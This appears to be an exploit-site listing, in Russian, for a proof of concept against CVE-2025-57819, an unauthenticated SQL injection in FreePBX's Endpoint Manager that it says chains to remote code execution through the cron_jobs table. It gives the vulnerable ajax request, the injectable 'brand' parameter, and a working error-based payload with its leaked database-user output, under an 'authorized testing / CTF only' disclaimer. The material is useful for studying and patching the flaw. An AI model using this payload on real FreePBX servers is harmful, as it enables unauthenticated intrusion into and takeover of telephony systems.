## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-B4SH2-CVE-2025-57819-POC
# CVE-2025-57819 — FreePBX: неаутентифицированная SQLi → RCE
Одношаговый эксплойт для неаутентифицированной SQL-инъекции в **Endpoint Manager** FreePBX (CVE-2025-57819), объединённой в удалённое выполнение кода через таблицу `cron_jobs` FreePBX.
> Только для авторизованного тестирования безопасности / использования в CTF.
* * *
## Уязвимость
Ajax-обработчик модуля endpoint конкатенирует параметр `brand` напрямую в SQL-запрос, а путь модуля `FreePBX\modules\endpoint\ajax` обходит проверку Referrer/аутентификации ajax. Это даёт **неаутентифицированную** error-based SQL-инъекцию (через `EXTRACTVALUE`) с включёнными **записями через стековые запросы**.
Точка инъекции:
root@kitploit:~
GET /admin/ajax.php?module=FreePBX\modules\endpoint\ajax
&command=model&template=x&model=model&brand=<INJECTION>
Доказательство (чтение на основе ошибок):
root@kitploit:~
brand=x' AND EXTRACTVALUE(1,CONCAT('~',(SELECT USER()),'~')) -- -
→ {"error":{"message":"... XPATH syntax error: '~freepbxuser@localhost~' ..."}}